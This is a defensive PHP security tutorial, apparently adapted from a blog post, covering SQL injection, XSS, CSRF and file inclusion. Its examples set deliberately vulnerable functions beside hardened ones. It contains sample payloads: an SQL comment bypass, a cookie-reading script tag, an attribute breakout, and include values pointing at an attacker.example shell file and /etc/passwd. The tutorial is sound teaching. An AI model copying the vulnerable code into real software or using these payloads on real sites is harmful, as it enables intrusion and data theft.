Common PHP security attacks

SQL injection : an attacker places crafted input in form fields (or any other user-controlled input) so that it becomes part of the SQL statement the application builds, changing what the query does.
Prevention : never build SQL by concatenating user input. Validate every value against the type and range the field expects, and use prepared statements with bound parameters (parameterized SQL): the statement is written once with placeholders where the data values go (? or a named placeholder such as :name in PDO; some other database APIs use @name), and the values are supplied separately, so they are never parsed as SQL. Escaping with mysql_real_escape_string() is only a fallback for legacy code: it has to be applied manually and consistently to every value, and the mysql extension it belongs to was removed in PHP 7 (mysqli_real_escape_string() is the replacement).
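Added example (not code from the original post): the same login query written with string concatenation and with a prepared statement, run side by side. It uses PDO with an in-memory SQLite database so it runs offline; the users table, its two rows and the attacker's input are constructed here.

```php
<?php
// Added example, not the original post's code. In-memory SQLite via PDO so
// the script runs without a database server; rows are constructed below.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$pdo->exec("INSERT INTO users (username, password) VALUES ('alice', 's3cret'), ('bob', 'hunter2')");

// Vulnerable: the submitted values are pasted straight into the SQL text,
// so a quote in the input ends the string and the rest becomes SQL.
function loginVulnerable(PDO $pdo, string $user, string $pass): array
{
    $sql = "SELECT id, username FROM users WHERE username = '$user' AND password = '$pass'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: a prepared statement with ? placeholders. The statement text is
// fixed before the values are bound, so the values can only ever be data.
function loginSafe(PDO $pdo, string $user, string $pass): array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE username = ? AND password = ?');
    $stmt->execute([$user, $pass]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Lookup by id, binding the value with an explicit type: the "check the data
// type" step from the text, done by the driver instead of by hand.
function findUser(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, username FROM users WHERE id = ?');
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed attacker input: the quote closes the username string and the
// SQL comment marker (--) discards the password check that follows it.
$evilUser = "alice' -- ";
$anyPass  = 'wrong';

// Vulnerable query: the password check is commented out, alice is returned.
var_dump(loginVulnerable($pdo, $evilUser, $anyPass));
// Prepared statement: the whole string is compared to the username column, no match.
var_dump(loginSafe($pdo, $evilUser, $anyPass));
var_dump(findUser($pdo, 2));
```

The vulnerable function returns alice's row with no valid password, because the query it ran was SELECT ... WHERE username = 'alice' -- ' AND password = 'wrong'. The prepared statement returns an empty array: the literal string "alice' -- " is not a username. With PDO, also set PDO::ATTR_EMULATE_PREPARES to false on MySQL so the server, not the client, does the parameter binding.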


XSS attacks  : cross-site scripting. Some of the data a user submits to your site contains client-side script (usually JavaScript). If that data is written into another web page without being filtered or escaped on output, the browser runs the script in the context of your site.
Prevention : escape every user-controlled value at the point where it is written into HTML, using PHP's htmlentities() (or htmlspecialchars()) with ENT_QUOTES and an explicit character set such as UTF-8, so that the characters < > & " ' are rendered as text rather than parsed as markup. Escaping on output is what counts, and it has to match the context: htmlentities() is right for element content and quoted attributes, but data placed inside a script block or a URL needs the encoding for that context.
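Added example (not code from the original post): one helper that escapes for HTML output, applied to a constructed comment payload in two contexts, element content and a quoted attribute. The template is a stand-in for any page that echoes user data; the attribute case is included because htmlentities() without ENT_QUOTES would leave the quote character alone and the attribute would still break out.

```php
<?php
// Added example, not the original post's code. The user values below are
// constructed payloads; the markup is a stand-in for a real template.

// Escape for HTML element content and for double- or single-quoted attributes.
// ENT_QUOTES covers both quote characters; the charset must be stated so that
// multibyte sequences are handled correctly and never silently dropped.
function e(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed attacker input.
$userComment = '<script>alert(document.cookie)</script>';   // targets element content
$userName    = '" onmouseover="alert(1)';                    // targets an attribute value

// Vulnerable: raw user data concatenated into the page.
function renderVulnerable(string $name, string $comment): string
{
    return '<div class="comment" data-author="' . $name . '">' . $comment . '</div>';
}

// Hardened: every user-controlled value escaped on output, in both contexts.
function renderSafe(string $name, string $comment): string
{
    return '<div class="comment" data-author="' . e($name) . '">' . e($comment) . '</div>';
}

// The first line contains a live <script> element and an injected onmouseover
// handler; the second renders both payloads as inert text.
echo renderVulnerable($userName, $userComment), "\n";
echo renderSafe($userName, $userComment), "\n";
```

For a value that has to go inside a JavaScript block, json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT) is the appropriate encoding rather than htmlentities(); for a value placed in a URL query string, rawurlencode() and then the HTML escape on the whole attribute.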


CSRF : cross-site request forgery. A request arrives at your site that looks as if it comes from an authenticated, trusted user, but it was forged by another site the user visited; the browser attaches the user's cookies to it automatically.
Prevention : make sure every form submission you accept came from a form your site itself sent to that user, and match each submitted form against the one you issued. Two things to remember: protect the user session with appropriate measures (for example, regenerate the session id on login and serve the site over SSL/TLS), and generate a one-time token, embed it in the form as a hidden field, store it in a session variable, and check on submission that the posted token matches the stored one. This is what Laravel's _token field does.
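Added example (not code from the original post, and not Laravel's implementation): issuing a one-time token, embedding it in a form, and verifying it on submission. The $session array stands in for $_SESSION so the script runs from the command line; in a web application the same functions would be called after session_start() with $_SESSION passed in.

```php
<?php
// Added example, not the original post's code. $session stands in for
// $_SESSION so this runs without a web server or session_start().

// Issue a fresh, unpredictable token and remember it server-side.
function csrfIssueToken(array &$session): string
{
    $token = bin2hex(random_bytes(32));       // 256 bits from the CSPRNG
    $session['csrf_token'] = $token;
    return $token;
}

// Render the token into the form as a hidden field (Laravel names it _token).
function csrfHiddenField(string $token): string
{
    return '<input type="hidden" name="_token" value="'
        . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '">';
}

// On submission: compare the posted token with the stored one in constant
// time, and discard the stored token so it is strictly one-time.
function csrfVerify(array &$session, array $post): bool
{
    $expected = $session['csrf_token'] ?? null;
    unset($session['csrf_token']);            // consumed whether or not it matches
    if ($expected === null || !isset($post['_token']) || !is_string($post['_token'])) {
        return false;
    }
    return hash_equals($expected, $post['_token']);
}

// Constructed walk-through.
$session = [];                                // would be $_SESSION in practice
$token = csrfIssueToken($session);
echo '<form method="post" action="/transfer">' . csrfHiddenField($token) . "...</form>\n";

// Genuine submission carrying the token the site issued: accepted.
var_dump(csrfVerify($session, ['_token' => $token]));
// Replay of the same token: rejected, it was consumed by the first check.
var_dump(csrfVerify($session, ['_token' => $token]));
// Forged request from another origin, which cannot read the session: rejected.
$token = csrfIssueToken($session);
var_dump(csrfVerify($session, ['_token' => 'guessed-by-attacker']));
```

Pair this with session_regenerate_id(true) after a successful login and with the Secure and HttpOnly cookie flags, so the token cannot be read from a leaked or fixated session. hash_equals() is used instead of == so that the comparison time does not leak how many leading characters matched.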


Code injection : code injection exploits a flaw in how a program handles invalid data; the result is that the program executes arbitrary attacker-supplied code, in PHP most often through file inclusion. Badly written code can allow a remote file to be included and executed, because PHP functions such as require and include accept a URL as well as a file name.
Prevention : filter user input, and never pass a user-controlled value to include/require without checking it against a fixed list of allowed files. In php.ini, set allow_url_include = Off (it has been Off by default since PHP 5.2) so that include/require cannot load remote files, and set allow_url_fopen = Off unless the application genuinely needs fopen()/file_get_contents() on URLs, since that setting governs URL support in those functions. Both options can only be changed in php.ini, not at runtime.
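Added example (not code from the original post): a page-selector that includes whatever arrives in a request parameter, beside a hardened version that only accepts keys from a fixed map, plus a startup check on allow_url_include. The 'page' parameter name and the two page templates are assumptions; the templates are written to a temporary directory so the script runs stand-alone, and the request values at the bottom are constructed.

```php
<?php
// Added example, not the original post's code. The page templates are created
// in a temporary directory so the script runs stand-alone; in a real application
// they would live in a fixed directory inside the project.
$pagesDir = sys_get_temp_dir() . '/rfi_demo_' . bin2hex(random_bytes(4));
mkdir($pagesDir);
file_put_contents("$pagesDir/home.php",  "<?php echo \"home page\\n\";");
file_put_contents("$pagesDir/about.php", "<?php echo \"about page\\n\";");

// Vulnerable: whatever arrives in ?page= becomes the include path. With
// allow_url_include=On, page=http://attacker.example/shell.txt fetches and runs
// remote code; even with it Off, page=../../../etc/passwd reads a local file.
function renderVulnerable(string $page): void
{
    include $page;
}

// Hardened: the request value is only ever a key into a fixed map of files,
// so no attacker-controlled characters reach the include path at all.
function resolvePage(string $page, array $allowed): ?string
{
    return $allowed[$page] ?? null;
}

function renderSafe(string $page, array $allowed): void
{
    $file = resolvePage($page, $allowed);
    if ($file === null) {
        echo "unknown page\n";                // in a web app: http_response_code(404)
        return;
    }
    include $file;
}

// Defence in depth: refuse to start if php.ini still permits remote includes.
// allow_url_include is PHP_INI_SYSTEM, so it cannot be corrected with ini_set().
function remoteIncludeEnabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

$allowed = [
    'home'  => "$pagesDir/home.php",
    'about' => "$pagesDir/about.php",
];

if (remoteIncludeEnabled()) {
    exit("allow_url_include is On; set allow_url_include = Off in php.ini\n");
}

// Constructed request values: the first is legitimate, the others are attacker-supplied
// and are rejected because they are not keys of $allowed.
foreach (['home', '../../../etc/passwd', 'http://attacker.example/shell.txt'] as $page) {
    renderSafe($page, $allowed);
}

array_map('unlink', glob("$pagesDir/*.php"));
rmdir($pagesDir);
```

The matching php.ini settings are allow_url_include = Off and, where URL access from fopen()/file_get_contents() is not needed, allow_url_fopen = Off. The allowlist is what actually stops local file inclusion; the ini settings only remove the remote variant.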

Source: blog.csdn.net/qq_43162613/article/details/104168201